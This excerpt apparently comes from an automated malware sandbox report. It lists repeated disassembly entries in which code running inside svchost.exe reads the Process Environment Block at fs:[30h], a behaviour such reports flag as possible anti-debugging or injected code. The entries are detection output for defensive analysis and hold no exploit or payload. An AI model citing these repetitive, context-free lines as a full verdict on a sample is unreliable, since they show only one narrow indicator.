Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]	1_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5C073 mov eax, dword ptr fs:[00000030h]	1_2_03A5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A32050 mov eax, dword ptr fs:[00000030h]	1_2_03A32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB6050 mov eax, dword ptr fs:[00000030h]	1_2_03AB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A307AF mov eax, dword ptr fs:[00000030h]	1_2_03A307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE47A0 mov eax, dword ptr fs:[00000030h]	1_2_03AE47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD678E mov eax, dword ptr fs:[00000030h]	1_2_03AD678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A527ED mov eax, dword ptr fs:[00000030h]	1_2_03A527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A527ED mov eax, dword ptr fs:[00000030h]	1_2_03A527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A527ED mov eax, dword ptr fs:[00000030h]	1_2_03A527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]	1_2_03ABE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A347FB mov eax, dword ptr fs:[00000030h]	1_2_03A347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A347FB mov eax, dword ptr fs:[00000030h]	1_2_03A347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]	1_2_03A3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB07C3 mov eax, dword ptr fs:[00000030h]	1_2_03AB07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6C720 mov eax, dword ptr fs:[00000030h]	1_2_03A6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6C720 mov eax, dword ptr fs:[00000030h]	1_2_03A6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6273C mov eax, dword ptr fs:[00000030h]	1_2_03A6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6273C mov ecx, dword ptr fs:[00000030h]	1_2_03A6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6273C mov eax, dword ptr fs:[00000030h]	1_2_03A6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAC730 mov eax, dword ptr fs:[00000030h]	1_2_03AAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6C700 mov eax, dword ptr fs:[00000030h]	1_2_03A6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A30710 mov eax, dword ptr fs:[00000030h]	1_2_03A30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A60710 mov eax, dword ptr fs:[00000030h]	1_2_03A60710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A38770 mov eax, dword ptr fs:[00000030h]	1_2_03A38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770 mov eax, dword ptr fs:[00000030h]	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6674D mov esi, dword ptr fs:[00000030h]	1_2_03A6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6674D mov eax, dword ptr fs:[00000030h]	1_2_03A6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6674D mov eax, dword ptr fs:[00000030h]	1_2_03A6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A30750 mov eax, dword ptr fs:[00000030h]	1_2_03A30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABE75D mov eax, dword ptr fs:[00000030h]	1_2_03ABE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72750 mov eax, dword ptr fs:[00000030h]	1_2_03A72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72750 mov eax, dword ptr fs:[00000030h]	1_2_03A72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB4755 mov eax, dword ptr fs:[00000030h]	1_2_03AB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]	1_2_03A6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A666B0 mov eax, dword ptr fs:[00000030h]	1_2_03A666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A34690 mov eax, dword ptr fs:[00000030h]	1_2_03A34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A34690 mov eax, dword ptr fs:[00000030h]	1_2_03A34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB06F1 mov eax, dword ptr fs:[00000030h]	1_2_03AB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB06F1 mov eax, dword ptr fs:[00000030h]	1_2_03AB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_03A6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]	1_2_03A6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4E627 mov eax, dword ptr fs:[00000030h]	1_2_03A4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A66620 mov eax, dword ptr fs:[00000030h]	1_2_03A66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A68620 mov eax, dword ptr fs:[00000030h]	1_2_03A68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3262C mov eax, dword ptr fs:[00000030h]	1_2_03A3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE609 mov eax, dword ptr fs:[00000030h]	1_2_03AAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]	1_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]	1_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]	1_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]	1_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]	1_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]	1_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4260B mov eax, dword ptr fs:[00000030h]	1_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72619 mov eax, dword ptr fs:[00000030h]	1_2_03A72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF866E mov eax, dword ptr fs:[00000030h]	1_2_03AF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF866E mov eax, dword ptr fs:[00000030h]	1_2_03AF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6A660 mov eax, dword ptr fs:[00000030h]	1_2_03A6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6A660 mov eax, dword ptr fs:[00000030h]	1_2_03A6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A62674 mov eax, dword ptr fs:[00000030h]	1_2_03A62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4C640 mov eax, dword ptr fs:[00000030h]	1_2_03A4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB05A7 mov eax, dword ptr fs:[00000030h]	1_2_03AB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB05A7 mov eax, dword ptr fs:[00000030h]	1_2_03AB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB05A7 mov eax, dword ptr fs:[00000030h]	1_2_03AB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A545B1 mov eax, dword ptr fs:[00000030h]	1_2_03A545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A545B1 mov eax, dword ptr fs:[00000030h]	1_2_03A545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A32582 mov eax, dword ptr fs:[00000030h]	1_2_03A32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A32582 mov ecx, dword ptr fs:[00000030h]	1_2_03A32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A64588 mov eax, dword ptr fs:[00000030h]	1_2_03A64588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E59C mov eax, dword ptr fs:[00000030h]	1_2_03A6E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A325E0 mov eax, dword ptr fs:[00000030h]	1_2_03A325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6C5ED mov eax, dword ptr fs:[00000030h]	1_2_03A6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6C5ED mov eax, dword ptr fs:[00000030h]	1_2_03A6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E5CF mov eax, dword ptr fs:[00000030h]	1_2_03A6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E5CF mov eax, dword ptr fs:[00000030h]	1_2_03A6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A365D0 mov eax, dword ptr fs:[00000030h]	1_2_03A365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]	1_2_03A6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]	1_2_03A6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]	1_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]	1_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]	1_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]	1_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]	1_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40535 mov eax, dword ptr fs:[00000030h]	1_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E53E mov eax, dword ptr fs:[00000030h]	1_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E53E mov eax, dword ptr fs:[00000030h]	1_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E53E mov eax, dword ptr fs:[00000030h]	1_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E53E mov eax, dword ptr fs:[00000030h]	1_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E53E mov eax, dword ptr fs:[00000030h]	1_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC6500 mov eax, dword ptr fs:[00000030h]	1_2_03AC6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]	1_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]	1_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]	1_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]	1_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]	1_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]	1_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04500 mov eax, dword ptr fs:[00000030h]	1_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6656A mov eax, dword ptr fs:[00000030h]	1_2_03A6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6656A mov eax, dword ptr fs:[00000030h]	1_2_03A6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6656A mov eax, dword ptr fs:[00000030h]	1_2_03A6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A38550 mov eax, dword ptr fs:[00000030h]	1_2_03A38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A38550 mov eax, dword ptr fs:[00000030h]	1_2_03A38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A364AB mov eax, dword ptr fs:[00000030h]	1_2_03A364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A644B0 mov ecx, dword ptr fs:[00000030h]	1_2_03A644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABA4B0 mov eax, dword ptr fs:[00000030h]	1_2_03ABA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AEA49A mov eax, dword ptr fs:[00000030h]	1_2_03AEA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A304E5 mov ecx, dword ptr fs:[00000030h]	1_2_03A304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2E420 mov eax, dword ptr fs:[00000030h]	1_2_03A2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2E420 mov eax, dword ptr fs:[00000030h]	1_2_03A2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2E420 mov eax, dword ptr fs:[00000030h]	1_2_03A2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2C427 mov eax, dword ptr fs:[00000030h]	1_2_03A2C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]	1_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]	1_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]	1_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]	1_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]	1_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]	1_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB6420 mov eax, dword ptr fs:[00000030h]	1_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A68402 mov eax, dword ptr fs:[00000030h]	1_2_03A68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A68402 mov eax, dword ptr fs:[00000030h]	1_2_03A68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A68402 mov eax, dword ptr fs:[00000030h]	1_2_03A68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABC460 mov ecx, dword ptr fs:[00000030h]	1_2_03ABC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5A470 mov eax, dword ptr fs:[00000030h]	1_2_03A5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5A470 mov eax, dword ptr fs:[00000030h]	1_2_03A5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5A470 mov eax, dword ptr fs:[00000030h]	1_2_03A5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]	1_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]	1_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]	1_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]	1_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]	1_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]	1_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]	1_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E443 mov eax, dword ptr fs:[00000030h]	1_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AEA456 mov eax, dword ptr fs:[00000030h]	1_2_03AEA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2645D mov eax, dword ptr fs:[00000030h]	1_2_03A2645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5245A mov eax, dword ptr fs:[00000030h]	1_2_03A5245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40BBE mov eax, dword ptr fs:[00000030h]	1_2_03A40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40BBE mov eax, dword ptr fs:[00000030h]	1_2_03A40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]	1_2_03AE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]	1_2_03AE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A38BF0 mov eax, dword ptr fs:[00000030h]	1_2_03A38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A38BF0 mov eax, dword ptr fs:[00000030h]	1_2_03A38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A38BF0 mov eax, dword ptr fs:[00000030h]	1_2_03A38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5EBFC mov eax, dword ptr fs:[00000030h]	1_2_03A5EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABCBF0 mov eax, dword ptr fs:[00000030h]	1_2_03ABCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A50BCB mov eax, dword ptr fs:[00000030h]	1_2_03A50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A50BCB mov eax, dword ptr fs:[00000030h]	1_2_03A50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A50BCB mov eax, dword ptr fs:[00000030h]	1_2_03A50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A30BCD mov eax, dword ptr fs:[00000030h]	1_2_03A30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A30BCD mov eax, dword ptr fs:[00000030h]	1_2_03A30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A30BCD mov eax, dword ptr fs:[00000030h]	1_2_03A30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADEBD0 mov eax, dword ptr fs:[00000030h]	1_2_03ADEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5EB20 mov eax, dword ptr fs:[00000030h]	1_2_03A5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5EB20 mov eax, dword ptr fs:[00000030h]	1_2_03A5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF8B28 mov eax, dword ptr fs:[00000030h]	1_2_03AF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF8B28 mov eax, dword ptr fs:[00000030h]	1_2_03AF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04B00 mov eax, dword ptr fs:[00000030h]	1_2_03B04B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2CB7E mov eax, dword ptr fs:[00000030h]	1_2_03A2CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE4B4B mov eax, dword ptr fs:[00000030h]	1_2_03AE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE4B4B mov eax, dword ptr fs:[00000030h]	1_2_03AE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B02B57 mov eax, dword ptr fs:[00000030h]	1_2_03B02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B02B57 mov eax, dword ptr fs:[00000030h]	1_2_03B02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B02B57 mov eax, dword ptr fs:[00000030h]	1_2_03B02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B02B57 mov eax, dword ptr fs:[00000030h]	1_2_03B02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC6B40 mov eax, dword ptr fs:[00000030h]	1_2_03AC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC6B40 mov eax, dword ptr fs:[00000030h]	1_2_03AC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFAB40 mov eax, dword ptr fs:[00000030h]	1_2_03AFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD8B42 mov eax, dword ptr fs:[00000030h]	1_2_03AD8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A28B50 mov eax, dword ptr fs:[00000030h]	1_2_03A28B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADEB50 mov eax, dword ptr fs:[00000030h]	1_2_03ADEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A38AA0 mov eax, dword ptr fs:[00000030h]	1_2_03A38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A38AA0 mov eax, dword ptr fs:[00000030h]	1_2_03A38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A86AA4 mov eax, dword ptr fs:[00000030h]	1_2_03A86AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04A80 mov eax, dword ptr fs:[00000030h]	1_2_03B04A80
